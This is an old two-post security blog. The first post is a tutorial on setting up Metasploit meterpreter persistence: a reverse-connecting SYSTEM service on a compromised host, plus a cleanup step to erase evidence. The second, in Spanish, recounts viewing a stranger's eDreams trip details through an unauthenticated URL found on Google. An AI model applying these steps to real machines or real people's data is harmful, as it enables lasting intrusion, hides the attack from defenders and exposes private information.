martes, 20 de marzo de 2012

Owned for ever


Some days ago, I read something about the modules of meterpreter that one can execute once a machine has been compromised but I can't remember where I did it. So, I want to talk about the use of some of them.

First for all, we have a lot of scripts to run (about 180) and we can do some actions such as to collect the credentials stored in the system, or in the software installed.

There are other options one can do, and one this is the possibility to make our connection persistent and mantain that channel for future connections. In order to do that, we must use the "persistent" script. For see the options that it have, one must execute "run persistence -h":

Using that script, we create service on the compromissed machine that it will be ready every time the server will be rebooted.

To explain how it works, we must know the options it have:

-A Automatically start a matching multi/handler to connect to the agent
-L Location in target host where to write payload to, if none %TEMP% will be used.
-P Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

I will use the options "-A", "-S", "-X", "-p 4445" and "-r 192.168.0.182". As we can see on the following image, a new session has been created, and also we can see where the vbs script has been stored and executed with a new process ID (PID).

If we want to proof if the channel is persistent now, we must reboot the owned computer, so the active sessions will be died and when the computer has been loaded it will try to connect to our multihandler.


In order to clean our evidences, we must delete the files created, and kill the current process. For do that, whe we run for the first time the "persistent" script, a cleaning script has been created on /root/.msf4/logs/persistence/*.rc, so we must to change the PID on the script and put it as the last command to execute because if we run that before the other commands, the conection will be died, and will not be possible to delete the key on the register.

At last, we must run the "resource" command for meterpreter to execute the cleaning script.

It is possible to obtain some errors when we run the resource command, but only the accepted errors are when tring to delete the payload created on the system (only, if we didn't change the path and the script was created on the %TEMP% directory because when the machine will be rebooted, the script will be deleted), and the error when tring to kill the Process, for the same reason.

miércoles, 7 de marzo de 2012

Cuidado con lo que te cachean... y no en los aeropuertos


Hace unos días me compré un billete de avión y me llegó al móvil un SMS por parte de eDreams con una url acortada por Tinyurl para que si lo abro desde el móvil me muestra la información de ruta de ésta compra.

El problema fue, que no entré con mi teléfono a la página, si no con mi ordenador y un navegador normal... Y al "des-acortar" la url, me entraba directamente a la aplicación móvil, con los datos de "trayecto" para mi usuario.

La URL que se genera para poder entrar es del siguiente estilo:
http://m.edreams.es/Mobile/b2aeb0a0****************

Así que.. por que no buscar si existe algún contenido similar en google?

Pues la respuesta es que sí, existe, por lo menos un resultado, que permite acceder a los trayectos de un usuario de eDreams, dónde se pueden observar 3 de sus próximos viajes.


Por desgracia.. sólo permite observar.. nada de cambios de nombres ni nada por el estilo más jugoso ;)